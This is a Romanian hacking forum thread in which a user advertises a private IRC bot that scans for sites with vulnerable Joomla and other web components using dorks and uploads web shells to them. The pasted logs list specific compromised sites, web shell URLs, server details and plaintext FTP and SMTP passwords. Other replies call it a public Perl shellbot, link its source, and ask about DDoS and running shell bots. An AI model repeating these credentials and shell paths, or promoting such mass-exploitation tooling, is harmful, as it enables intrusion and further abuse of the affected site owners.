cPanel Posted January 4, 2014 Report Posted January 4, 2014 (edited) Jce Shell uploader: !jce [dork] Civi Vuln: !civi [dork] Acy Vuln Uploaded: !acy [dork] JnewsLetter Vuln: !jnewsletter [dork] Jinc Vuln: !jinc [dork] Maianmedia Vuln: !mai [dork] Jnews Vuln: !jnews [dork] Redmystic Vuln: !red [dork] PhpVMS Vuln: !vms [dork] ClipBucket Vuln: !cbk [dork] Slimstat Vuln: !slim [dork] invit0r Vuln: !inv [dork] Seo Watcher Vuln: !seo [dork] OpenEmr Vuln: !emr [dork] ----scanezi si iti da shelul, pe bugul acela.Un Mic Test :-=(16:00:29)=- <@cPanel> !jce /images/stories/ +partners-=(16:00:29)=- <@Jt> Private JCE source!-=(16:00:29)=- <@JT> (Jce) Dork: /images/stories/ +partners-=(16:00:29)=- <@JT> (Jce) Search Engine Loading ...Si logurile ti le da pe chan/prvExample : -=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON -=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON -=(16:10:48)=- <JT> (Jce) <> MaMa <>(@SheLL) IAM - DNSNET (SafeMode=OFF) (OS=Linux hosting2.reymann.com 2.6.32-54-server #116-Ubuntu SMP Tue Nov 12 19:37:57 UTC 2013 x86_64) (uid=33(www-data) -=(16:10:48)=- <JT> (Jce) <> FTP <> ftp://www.paris-store.com/ [ 127.0.0.1 21 paris-store_ftp.paris-store hoopla08 ] -=(16:10:50)=- <JT> (Jce) <> SMTP <> ftp://www.paris-store.com/ [ smtp.reymann.com 25 smtp rey ] -----Botul are functia de ati scoate smtp/ftp din shelul prins !Cine o vrea si un o explicatie cum ruleaza PM<JT> (Jce) <> GooGLe <>(@SheLL) http://www.bieneskatzenwelt.de//images/stories/plnt2.php (SafeMode=OFF) (OS=Linux h1867540.stratoserver.net 2.6.32-042stab078.27 #1 SMP Mon Jul 1 20:48:07 MSK 2013 i686) (uid=33(www-data) <JT> (Jce) <> FTP <> ftp://www.bieneskatzenwelt.de/ [ 127.0.0.1 21 admin 2002Minotaurus1979 ] <JT> (Jce) <> SMTP <> ftp://www.bieneskatzenwelt.de/ [ smtp.udag.de 25 bieneskatzenweltde-0001 4b!ene5 ] Edited January 6, 2014 by cPanel Quote
aelius Posted January 4, 2014 Report Posted January 4, 2014 Asta NU este:- Exploit- POC- Bot-ul tau nu ruleaza pe mirc, si pe IRCTot ce vedem aici e o simpla balarie. Pune sursa, asa se lucreaza aici.E un simplu shellbot scris in perl. Quote
cPanel Posted January 4, 2014 Author Report Posted January 4, 2014 @tex : ok , multumesc pentru corectarea pe care ai facut-o . Cum am mai zis PM , nu o fac publica.Poate o face publica altu , dar nu cam merita facuta publica, este prea "frumoasa" sa fie publica facuta. Quote
cPanel Posted January 4, 2014 Author Report Posted January 4, 2014 (edited) Este inca UP - Topicul...YaHoo www.uhal.sk - BOFF 1.0 FreeBSD dw8.nameserver.sk 9.1-STABLE FreeBSD 9.1-STABLE #0: Thu Feb 14 07:52:40 CET 2013 root@gw.nameserver.sk:/usr/obj/usr/src/sys/kernconf amd64-=(16:51:55)=- <JxBot> (Jce) SeZNam http://www.katcinasmecka.cz//images/stories/iam.php -=(17:47:29)=- <JxBot> (Jce) BigLobe http://www.pwsb.poznan.pl//images/stories/0day.php -=(17:50:39)=- <JxBot> (Jce) UoL http://www.pwsb.poznan.pl//images/stories/0day.php -=(17:52:17)=- <JxBot> (Jce) YaHoo http://www.agridept.gov.lk//images/stories/0day.php -=(17:55:59)=- <JxBot> (Jce) YaHoo http://www.gaictech.com//images/stories/0d4y.php MoDe:ONOFF : un bug sa scanez care da .. ii voi posta shelurile in Pm lui ! Edited January 4, 2014 by cPanel Quote
aelius Posted January 4, 2014 Report Posted January 4, 2014 (edited) Pai este publica sursa. Nu este facuta de tine. Daca o vinzi sau o dai contra unui schimb, posteaza te rog la RST Market, nu aici.Categoria asta este facuta pentru altceva: https://rstforums.com/forum/exploituri-si-pocs.rstsource: http://pastebin.com/raw.php?i=1SvVhNfUMi-am adus aminte de o chestie apropo de asta cu "scanner privat". Pe vremuri era un hunedorean ratat ce ne cerea exploit-uri sau scannere si scria el in scripturi "Powered by Zerg", apoi le publica pe net. Edited January 4, 2014 by aelius Quote
cPanel Posted January 4, 2014 Author Report Posted January 4, 2014 @Tex : Arhive de genul acela... gasesti peste google ( free ) si sti si tu tot ce este free cam nu este bun ..off : cum mut atuncea postarea "unde trebuie"ON : Rog un admin sa mute atuncea postul facut de mine unde trebuie ... Quote
cPanel Posted January 5, 2014 Author Report Posted January 5, 2014 (edited) Rog un admin sa inchida postul!ON : Topic Inchis !!! Edited January 6, 2014 by cPanel Quote
wind Posted January 15, 2014 Report Posted January 15, 2014 Prinde prostii, sursa ai gasit-o pe ceva forumuri straine, si tu vii sa vinzi gogosi, oricum, bafta la fraieri ! Quote
kumudam Posted January 18, 2014 Report Posted January 18, 2014 sunt si eu interesat de shells -o sa incerc chestia Quote
MajesticRol Posted February 3, 2014 Report Posted February 3, 2014 Are cineva de ddos si nu de udp ? Quote
magnum Posted February 3, 2014 Report Posted February 3, 2014 Are cineva de ddos si nu de udp ?Teoretic (si practic) mai multi boti = ddos. Unul singur e dos. Udp e doar un protocol ca si tcp. Ce vrei tu mai exact? Quote
staicut Posted June 1, 2014 Report Posted June 1, 2014 Salut tuturor am si eu o intrebare cine are bunavointa sa ma ajute si pe mine sa urc un boot de shell pe canalul de mirc ???am root dar nu stiu cum sa il urc?Am platit pe cineva sa imi arate si mi-a dat teapa.Va rog macar niste indicatii linkuri etc.Va multumesc din suflet Quote